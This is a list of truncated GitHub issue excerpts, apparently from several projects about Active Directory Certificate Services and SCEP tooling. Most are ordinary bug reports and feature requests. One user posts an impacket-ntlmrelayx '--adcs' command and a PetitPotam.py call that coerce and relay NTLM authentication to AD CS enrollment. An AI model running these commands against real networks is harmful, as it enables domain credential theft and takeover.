-
amazing tool! but somehow i cant get this working. im not sure what the problem is, maybe the space in the CA Name?
```
Certificate Authorities
0
CA Name : te…
-
Is there a way to add additional attributes to the cert request? For example, I frequently include subject alternate name (SAN) fields using the `san:dns=dns.name[&dns=dns.name]` format.
-
I try this 2 commands .but nothing receive .
impacket-ntlmrelayx -smb2support -t http://KALI_IP/certsrv/certfnsh.asp --adcs --template 'DomainComputers'
python3 PetitPotam.py KALI_IP Serv…
-
Some potential enhancements for the ROOTCA script. This is more for when a resource is created for the advanced cert config and thoughts to consider when putting it together.
```
CRLPu…
-
**Describe the bug**
In https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/export-root-certification-authority-certificate, step 2a is missing the following links:
http://\/cer…
-
hi, on line 1300 file name "/mscep.dll" is missing
`$CACaps = (Invoke-WebRequest -Uri "https://$hostname/certsrv/mscep?operation=GetCACaps&message=test").content`
it should be:
`$CACaps = (Invoke-W…
-
I am trying to get a signed certificate, but sscep doesn't work in Red Hat 9 (x86_64). The same version (0.10.0) works in Red Hat 8.
FIPS is disabled.
# sscep enroll -v -c /tmp/sert-0 -e /tmp/ser…
-
adcs-issuer version: 2.1.2
We use this issuer and under normal circumstances everything works as expected.
Our Active Directory team has changed the template name without our knowledge and we ha…
-
Hi, first of all, thank you for this project, it is awesome.
## problem description
During development of policy module for the ADCS, I run into a problem of race conditions.
It turns out the A…
-
This issue was migrated from [Pagure Issue #181](https://pagure.io/dogtagpki/issue/181). Originally filed by **[edewata](https://pagure.io/user/edewata) (@edewata)** on *2012-05-22 17:36:55*:
- Assig…